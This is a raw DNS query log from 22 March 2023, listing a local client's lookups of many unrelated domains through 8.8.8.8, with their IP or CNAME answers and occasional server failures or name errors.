Mar 22, 2023 05:45:03.666848898 CET	8.8.8.8	192.168.2.5	0xc902	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.666848898 CET	8.8.8.8	192.168.2.5	0xc902	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.670797110 CET	8.8.8.8	192.168.2.5	0x1653	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.682456017 CET	8.8.8.8	192.168.2.5	0xd6e4	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.774405003 CET	8.8.8.8	192.168.2.5	0x887d	No error (0)	www.sclover3.com		157.112.182.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.777828932 CET	8.8.8.8	192.168.2.5	0x3773	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.792747021 CET	8.8.8.8	192.168.2.5	0x9f9e	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.811350107 CET	8.8.8.8	192.168.2.5	0x61a	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.825325966 CET	8.8.8.8	192.168.2.5	0x46cc	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.833784103 CET	8.8.8.8	192.168.2.5	0x1019	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.889254093 CET	8.8.8.8	192.168.2.5	0x8570	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.889254093 CET	8.8.8.8	192.168.2.5	0x8570	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.889254093 CET	8.8.8.8	192.168.2.5	0x8570	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.889254093 CET	8.8.8.8	192.168.2.5	0x8570	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.892529011 CET	8.8.8.8	192.168.2.5	0xe0bd	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.910446882 CET	8.8.8.8	192.168.2.5	0x1624	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.947695971 CET	8.8.8.8	192.168.2.5	0xaa7c	No error (0)	thiessen.net		62.75.251.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.947726011 CET	8.8.8.8	192.168.2.5	0xcc0a	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.014050007 CET	8.8.8.8	192.168.2.5	0x7a48	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.047734976 CET	8.8.8.8	192.168.2.5	0xb1cd	No error (0)	dspears.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:04.047734976 CET	8.8.8.8	192.168.2.5	0xb1cd	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:04.047734976 CET	8.8.8.8	192.168.2.5	0xb1cd	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.047734976 CET	8.8.8.8	192.168.2.5	0xb1cd	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.088219881 CET	8.8.8.8	192.168.2.5	0x2f7f	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.088219881 CET	8.8.8.8	192.168.2.5	0x2f7f	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.104765892 CET	8.8.8.8	192.168.2.5	0xa53b	No error (0)	ikulani.com		157.7.107.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.115739107 CET	8.8.8.8	192.168.2.5	0x616b	No error (0)	insia.com		82.208.6.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.176090002 CET	8.8.8.8	192.168.2.5	0x2b39	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.178651094 CET	8.8.8.8	192.168.2.5	0xa109	No error (0)	shztm.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.272619009 CET	8.8.8.8	192.168.2.5	0x97e5	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.409873009 CET	8.8.8.8	192.168.2.5	0x2169	No error (0)	linac.co.uk		23.236.62.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.492423058 CET	8.8.8.8	192.168.2.5	0x30f6	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.520735025 CET	8.8.8.8	192.168.2.5	0x8a82	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.532630920 CET	8.8.8.8	192.168.2.5	0x3ca7	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.558859110 CET	8.8.8.8	192.168.2.5	0xde56	No error (0)	t-mould.com		81.169.145.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.583750010 CET	8.8.8.8	192.168.2.5	0x9bef	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.602718115 CET	8.8.8.8	192.168.2.5	0x6cb5	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.723691940 CET	8.8.8.8	192.168.2.5	0x2348	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.993246078 CET	8.8.8.8	192.168.2.5	0xbfe3	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.021294117 CET	8.8.8.8	192.168.2.5	0x458b	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.062268972 CET	8.8.8.8	192.168.2.5	0xbae	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.150789022 CET	8.8.8.8	192.168.2.5	0xaa2e	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.232551098 CET	8.8.8.8	192.168.2.5	0x51ab	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.236426115 CET	8.8.8.8	192.168.2.5	0x76cd	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.236426115 CET	8.8.8.8	192.168.2.5	0x76cd	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.249079943 CET	8.8.8.8	192.168.2.5	0xc6a0	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.249079943 CET	8.8.8.8	192.168.2.5	0xc6a0	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.252935886 CET	8.8.8.8	192.168.2.5	0x4d2a	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.281503916 CET	8.8.8.8	192.168.2.5	0x4422	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.281503916 CET	8.8.8.8	192.168.2.5	0x4422	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.281552076 CET	8.8.8.8	192.168.2.5	0x2dd5	No error (0)	ncn.de		46.30.60.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.282366037 CET	8.8.8.8	192.168.2.5	0x597e	No error (0)	kewlmail.com		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.338800907 CET	8.8.8.8	192.168.2.5	0x5438	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.338800907 CET	8.8.8.8	192.168.2.5	0x5438	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.379283905 CET	8.8.8.8	192.168.2.5	0x28d9	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.399002075 CET	8.8.8.8	192.168.2.5	0x4fe0	No error (0)	603888.com	num6.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:05.399002075 CET	8.8.8.8	192.168.2.5	0x4fe0	No error (0)	num6.17986.net		67.21.93.229	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.420875072 CET	8.8.8.8	192.168.2.5	0x8a32	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.478777885 CET	8.8.8.8	192.168.2.5	0xe20d	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.478777885 CET	8.8.8.8	192.168.2.5	0xe20d	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.489332914 CET	8.8.8.8	192.168.2.5	0xaac7	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.508757114 CET	8.8.8.8	192.168.2.5	0xee20	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.508757114 CET	8.8.8.8	192.168.2.5	0xee20	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.523741961 CET	8.8.8.8	192.168.2.5	0xcd3c	No error (0)	holp-ai.com		59.106.13.169	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.564965010 CET	8.8.8.8	192.168.2.5	0xd8a6	No error (0)	alexpope.biz		76.74.184.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.573956966 CET	8.8.8.8	192.168.2.5	0x3ca7	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.632831097 CET	8.8.8.8	192.168.2.5	0x5a19	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.643340111 CET	8.8.8.8	192.168.2.5	0xed74	No error (0)	lyto.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.643340111 CET	8.8.8.8	192.168.2.5	0xed74	No error (0)	lyto.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.652645111 CET	8.8.8.8	192.168.2.5	0xae47	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.745634079 CET	8.8.8.8	192.168.2.5	0xcabd	No error (0)	magicomm.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.751357079 CET	8.8.8.8	192.168.2.5	0x8a43	No error (0)	sigtoa.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.751357079 CET	8.8.8.8	192.168.2.5	0x8a43	No error (0)	sigtoa.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.752126932 CET	8.8.8.8	192.168.2.5	0x6a70	No error (0)	metaforacom.com		185.42.105.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.767014027 CET	8.8.8.8	192.168.2.5	0x88cf	No error (0)	host.do		217.79.248.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.767812014 CET	8.8.8.8	192.168.2.5	0xd192	No error (0)	shenhgts.net		199.59.243.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.781702995 CET	8.8.8.8	192.168.2.5	0xe9fe	No error (0)	www.muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.788604975 CET	8.8.8.8	192.168.2.5	0xfb42	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.824554920 CET	8.8.8.8	192.168.2.5	0xefdc	No error (0)	impexnc.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.848661900 CET	8.8.8.8	192.168.2.5	0x1fcc	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.895600080 CET	8.8.8.8	192.168.2.5	0xceb	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.931446075 CET	8.8.8.8	192.168.2.5	0x214d	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.969413042 CET	8.8.8.8	192.168.2.5	0x920b	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.011365891 CET	8.8.8.8	192.168.2.5	0x9eca	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.014635086 CET	8.8.8.8	192.168.2.5	0x598d	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.014635086 CET	8.8.8.8	192.168.2.5	0x598d	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.033183098 CET	8.8.8.8	192.168.2.5	0x146a	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.039177895 CET	8.8.8.8	192.168.2.5	0x146a	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.122494936 CET	8.8.8.8	192.168.2.5	0xeb4d	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.161722898 CET	8.8.8.8	192.168.2.5	0xa2bd	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.216259003 CET	8.8.8.8	192.168.2.5	0x89d0	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.217259884 CET	8.8.8.8	192.168.2.5	0x6ce6	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.217259884 CET	8.8.8.8	192.168.2.5	0x6ce6	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.228694916 CET	8.8.8.8	192.168.2.5	0x8cfa	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.255836964 CET	8.8.8.8	192.168.2.5	0x6b55	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.288722992 CET	8.8.8.8	192.168.2.5	0xdd7a	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.411910057 CET	8.8.8.8	192.168.2.5	0xc0a	No error (0)	mail.airmail.net		66.226.70.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.412858963 CET	8.8.8.8	192.168.2.5	0xffe1	No error (0)	dhh.la.gov		52.200.51.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.413670063 CET	8.8.8.8	192.168.2.5	0x53a5	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.413670063 CET	8.8.8.8	192.168.2.5	0x53a5	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.414707899 CET	8.8.8.8	192.168.2.5	0xe2d3	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.415457010 CET	8.8.8.8	192.168.2.5	0xc32	No error (0)	nts-web.net		49.212.235.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.481616974 CET	8.8.8.8	192.168.2.5	0xf474	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:06.481616974 CET	8.8.8.8	192.168.2.5	0xf474	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:06.481616974 CET	8.8.8.8	192.168.2.5	0xf474	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:06.481616974 CET	8.8.8.8	192.168.2.5	0xf474	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.501645088 CET	8.8.8.8	192.168.2.5	0xc3ae	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.514497042 CET	8.8.8.8	192.168.2.5	0x63c3	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.570962906 CET	8.8.8.8	192.168.2.5	0x8e2c	No error (0)	www.diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.587505102 CET	8.8.8.8	192.168.2.5	0xf527	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.592788935 CET	8.8.8.8	192.168.2.5	0x3002	No error (0)	johnlyon.org		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.607952118 CET	8.8.8.8	192.168.2.5	0x7442	No error (0)	linac.co.uk		23.236.62.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.643001080 CET	8.8.8.8	192.168.2.5	0xac59	No error (0)	flamingorecordings.com		35.214.171.193	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.643938065 CET	8.8.8.8	192.168.2.5	0x856f	No error (0)	clinicasanluis.com.co		172.67.164.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.643938065 CET	8.8.8.8	192.168.2.5	0x856f	No error (0)	clinicasanluis.com.co		104.21.66.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.654788971 CET	8.8.8.8	192.168.2.5	0x3aed	No error (0)	strazynski.pl		85.128.196.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.656059980 CET	8.8.8.8	192.168.2.5	0x6cf4	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.656059980 CET	8.8.8.8	192.168.2.5	0x6cf4	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.656059980 CET	8.8.8.8	192.168.2.5	0x6cf4	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.656272888 CET	8.8.8.8	192.168.2.5	0x5a19	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.665388107 CET	8.8.8.8	192.168.2.5	0x9bef	Server failure (2)	actmin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.700887918 CET	8.8.8.8	192.168.2.5	0xa7ee	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.761043072 CET	8.8.8.8	192.168.2.5	0x8a13	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.763988972 CET	8.8.8.8	192.168.2.5	0xb927	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.780067921 CET	8.8.8.8	192.168.2.5	0xc524	No error (0)	zugseil.com		92.42.191.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.809869051 CET	8.8.8.8	192.168.2.5	0x74d1	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:06.809869051 CET	8.8.8.8	192.168.2.5	0x74d1	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.817198992 CET	8.8.8.8	192.168.2.5	0x3b8b	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.822159052 CET	8.8.8.8	192.168.2.5	0x16ab	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.822159052 CET	8.8.8.8	192.168.2.5	0x16ab	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.849575043 CET	8.8.8.8	192.168.2.5	0x2927	No error (0)	coxkitchensandbaths.com		205.149.134.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.932136059 CET	8.8.8.8	192.168.2.5	0xffb5	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.935409069 CET	8.8.8.8	192.168.2.5	0x2171	No error (0)	www.diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.949600935 CET	8.8.8.8	192.168.2.5	0xb2c0	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.957261086 CET	8.8.8.8	192.168.2.5	0xf60b	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.957283020 CET	8.8.8.8	192.168.2.5	0x5bca	No error (0)	hyab.com		104.21.65.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.957283020 CET	8.8.8.8	192.168.2.5	0x5bca	No error (0)	hyab.com		172.67.193.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.960391045 CET	8.8.8.8	192.168.2.5	0x1c29	No error (0)	106west.com		148.130.4.196	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.962802887 CET	8.8.8.8	192.168.2.5	0xa400	No error (0)	hyab.com		104.21.65.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.962802887 CET	8.8.8.8	192.168.2.5	0xa400	No error (0)	hyab.com		172.67.193.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.963845968 CET	8.8.8.8	192.168.2.5	0xcce1	No error (0)	ldh.la.gov		75.2.95.235	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.034111023 CET	8.8.8.8	192.168.2.5	0x2dd4	No error (0)	lpver.com		92.204.129.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.059426069 CET	8.8.8.8	192.168.2.5	0x9850	No error (0)	dataform.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.095485926 CET	8.8.8.8	192.168.2.5	0xa538	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.095485926 CET	8.8.8.8	192.168.2.5	0xa538	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.105870962 CET	8.8.8.8	192.168.2.5	0xa3d0	No error (0)	invictus.pl		193.107.88.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.121243000 CET	8.8.8.8	192.168.2.5	0x1cfc	No error (0)	www.hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.121243000 CET	8.8.8.8	192.168.2.5	0x1cfc	No error (0)	www.hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.175955057 CET	8.8.8.8	192.168.2.5	0xc278	No error (0)	kairel.com		54.217.118.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.223340988 CET	8.8.8.8	192.168.2.5	0xcd44	No error (0)	fundeo.com		104.24.160.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.223340988 CET	8.8.8.8	192.168.2.5	0xcd44	No error (0)	fundeo.com		172.67.97.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.223340988 CET	8.8.8.8	192.168.2.5	0xcd44	No error (0)	fundeo.com		104.24.161.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.230197906 CET	8.8.8.8	192.168.2.5	0xa6c4	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.255644083 CET	8.8.8.8	192.168.2.5	0xcc83	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.255644083 CET	8.8.8.8	192.168.2.5	0xcc83	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.267591953 CET	8.8.8.8	192.168.2.5	0x2b10	No error (0)	cbaben.com		173.205.126.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.302273989 CET	8.8.8.8	192.168.2.5	0x6393	No error (0)	bd-style.com		107.165.223.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.353916883 CET	8.8.8.8	192.168.2.5	0x6732	No error (0)	jsaps.com		49.212.235.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.356420994 CET	8.8.8.8	192.168.2.5	0x3945	No error (0)	karmy.com.pl		185.253.212.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.420897961 CET	8.8.8.8	192.168.2.5	0xeced	No error (0)	kevyt.net		172.67.129.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.420897961 CET	8.8.8.8	192.168.2.5	0xeced	No error (0)	kevyt.net		104.21.2.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.442476034 CET	8.8.8.8	192.168.2.5	0x9a07	No error (0)	cjborden.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.442476034 CET	8.8.8.8	192.168.2.5	0x9a07	No error (0)	cjborden.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.463177919 CET	8.8.8.8	192.168.2.5	0x70ee	No error (0)	hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.463177919 CET	8.8.8.8	192.168.2.5	0x70ee	No error (0)	hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.552788973 CET	8.8.8.8	192.168.2.5	0xf511	No error (0)	hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.552788973 CET	8.8.8.8	192.168.2.5	0xf511	No error (0)	hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.556413889 CET	8.8.8.8	192.168.2.5	0xc69d	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.613570929 CET	8.8.8.8	192.168.2.5	0x8029	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.615319014 CET	8.8.8.8	192.168.2.5	0x8fd5	No error (0)	softizer.com		185.163.45.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.710936069 CET	8.8.8.8	192.168.2.5	0x3bdb	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.718122005 CET	8.8.8.8	192.168.2.5	0xc837	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.734436989 CET	8.8.8.8	192.168.2.5	0xcdd	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.736035109 CET	8.8.8.8	192.168.2.5	0x2f6d	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:07.736035109 CET	8.8.8.8	192.168.2.5	0x2f6d	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.740008116 CET	8.8.8.8	192.168.2.5	0xc561	No error (0)	hubbikes.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:07.740008116 CET	8.8.8.8	192.168.2.5	0xc561	No error (0)	hubbikes.com		99.83.190.102	A (IP address)	IN (0x0001)	false
